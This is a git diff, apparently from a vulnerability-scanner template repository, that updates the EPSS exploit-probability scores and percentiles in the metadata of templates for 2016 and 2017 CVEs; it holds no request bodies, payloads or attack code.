a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 57bd1ccfb3..ca227f66e3 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98167 + epss-percentile: 0.98197 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 8b1d247367..5047e19355 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59506 + epss-percentile: 0.59667 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index c50ecad77e..e1daec70b1 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-4437 cwe-id: CWE-284 epss-score: 0.97507 - epss-percentile: 0.99979 + epss-percentile: 0.99981 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 0d8034c3b6..1a9ff30dc6 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 - epss-score: 0.00428 - epss-percentile: 0.71567 + epss-score: 0.00399 + epss-percentile: 0.70799 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index a1d54ee5da..329e960903 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - epss-percentile: 0.90341 + epss-percentile: 0.90401 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index f7ee34440c..b00a69edf6 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200,CWE-319 - epss-score: 0.15148 - epss-percentile: 0.95289 + epss-score: 0.17436 + epss-percentile: 0.95642 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 45ac6e5af8..6d984ac092 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.65149 + epss-percentile: 0.65319 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index ba2ec75bcc..833c42ebc2 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-6277 cwe-id: CWE-352 epss-score: 0.97471 - epss-percentile: 0.9996 + epss-percentile: 0.99961 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 34864c7675..11db8baf78 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97523 - epss-percentile: 0.99987 + epss-score: 0.97503 + epss-percentile: 0.99979 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index a0a5ec289d..d3e6ad1f62 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.97004 - epss-percentile: 0.99679 + epss-percentile: 0.99686 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 6b636062db..344f4892a1 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - epss-percentile: 0.5798 + epss-percentile: 0.58146 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 3e1c0bef30..b5bf78fb34 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63336 + epss-percentile: 0.63488 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index db4256e76a..6ded2e7477 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.0024 - epss-percentile: 0.61784 + epss-score: 0.00166 + epss-percentile: 0.53225 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 49bbb457df..ef179b9601 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.00753 - epss-percentile: 0.78905 + epss-percentile: 0.78998 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index c9f6825433..6483c3a920 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000028 cwe-id: CWE-22 epss-score: 0.97516 - epss-percentile: 0.99983 + epss-percentile: 0.99985 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 45a25120e1..6b49168faf 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - epss-percentile: 0.7017 + epss-percentile: 0.70348 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 2a7e1cab0b..0650577282 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00154 - epss-percentile: 0.51557 + epss-percentile: 0.51591 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index ee195221b2..1fee6244a4 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.70305 - epss-percentile: 0.97711 + epss-percentile: 0.97746 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 2cf9fa10b4..ea71f16043 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - epss-score: 0.96847 - epss-percentile: 0.99619 + epss-score: 0.97013 + epss-percentile: 0.99689 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 24fa96063c..7085a63b85 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00451 - epss-percentile: 0.72282 + epss-percentile: 0.72424 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 0f5c302d38..e55b3def3b 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - epss-score: 0.97438 - epss-percentile: 0.99938 + epss-score: 0.97426 + epss-percentile: 0.9993 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index f975386b4a..2a70320954 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.96161 - epss-percentile: 0.9937 + epss-percentile: 0.99386 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index e0bbec12a0..8eb27b839b 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.99005 + epss-percentile: 0.99027 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 0891277a11..c4791eecb7 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.018 - epss-percentile: 0.86739 + epss-percentile: 0.86776 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 1b63024fa1..8468f43128 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.99764 + epss-percentile: 0.99771 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index f0b55d14ce..2ce190b54d 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.46027 + epss-percentile: 0.46136 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index f71e5d3ec6..55a56afe8d 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11610 cwe-id: CWE-276 epss-score: 0.97438 - epss-percentile: 0.99941 + epss-percentile: 0.99943 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 8701e5c9e5..1464d1dd04 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40743 + epss-percentile: 0.40812 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 00f0b979df..3065dcad7c 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24467 + epss-percentile: 0.24379 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index f18f626b3c..24f508adfa 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.9719 - epss-percentile: 0.99774 + epss-percentile: 0.9978 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 8508cc091f..5eb82a92f4 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-12542 - epss-score: 0.97353 - epss-percentile: 0.99877 + epss-score: 0.9727 + epss-percentile: 0.99827 cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index cf6253daa0..c99a1f1cbc 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99575 + epss-percentile: 0.99581 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 5d9570fd9c..1cc7c32b27 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40743 + epss-percentile: 0.40812 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 55346d4a7c..ea271686b8 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12611 cwe-id: CWE-20 epss-score: 0.97358 - epss-percentile: 0.9988 + epss-percentile: 0.99884 cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 398bdf9076..5a01423e87 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 - epss-score: 0.96923 - epss-percentile: 0.99651 + epss-score: 0.96859 + epss-percentile: 0.99633 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 9074f5f73d..bdaff53c66 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.1 cve-id: "CVE-2017-12617" cwe-id: CWE-434 - epss-score: 0.9747 - epss-percentile: 0.99959 + epss-score: 0.97479 + epss-percentile: 0.99963 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index f3d37d4cd4..ab65a70a32 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12629 cwe-id: CWE-611 epss-score: 0.97438 - epss-percentile: 0.99937 + epss-percentile: 0.99942 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 43623e793f..c604e68566 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12635 cwe-id: CWE-269 epss-score: 0.97413 - epss-percentile: 0.99915 + epss-percentile: 0.9992 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index cc69e3f2c3..39a2f5188e 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.76992 + epss-percentile: 0.77083 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index ab73021ea5..25e8a01d27 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59669 + epss-percentile: 0.59827 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index c70116e62b..53e8db3460 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99552 + epss-percentile: 0.99564 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 3da75fbe4d..35377b6fdf 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89758 + epss-percentile: 0.89813 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 7d2a1c2af1..5b7f7b930e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.63339 + epss-percentile: 0.63491 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index daac719fd7..a4bcde6634 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91516 + epss-percentile: 0.91577 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 168b15f886..08b59750e9 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - epss-percentile: 0.8189 + epss-percentile: 0.81968 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index f057b6a698..e9dda5f5a5 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48421 + epss-percentile: 0.48536 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index bbba668241..f783db1dca 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.5005 + epss-percentile: 0.50158 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index ab037ec119..4276e1c8bd 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96684 - epss-percentile: 0.99554 + epss-percentile: 0.99566 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index d8bc45f000..639c0a26f4 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47319 + epss-percentile: 0.47426 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index c0b652cc0b..1635997b18 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - epss-percentile: 0.91463 + epss-percentile: 0.91525 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 6fde3c1850..3b53374a9c 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - epss-percentile: 0.87621 + epss-percentile: 0.87655 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 1ee0b87025..f4489db9ff 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.96163 - epss-percentile: 0.99371 + epss-percentile: 0.99387 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 54a89b4589..32175184aa 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - epss-score: 0.97344 - epss-percentile: 0.99872 + epss-score: 0.97314 + epss-percentile: 0.9986 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index c1573f9479..b5beac8d6b 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93282 + epss-percentile: 0.93332 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 568b6a47e3..f14735fbf3 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.00337 - epss-percentile: 0.68131 + epss-percentile: 0.68302 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 7c8c7b0124..c69161bc67 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.11608 - epss-percentile: 0.94715 + epss-percentile: 0.94744 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index bc046d444f..1fd7b056b5 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -20,7 +20,7 @@ info: 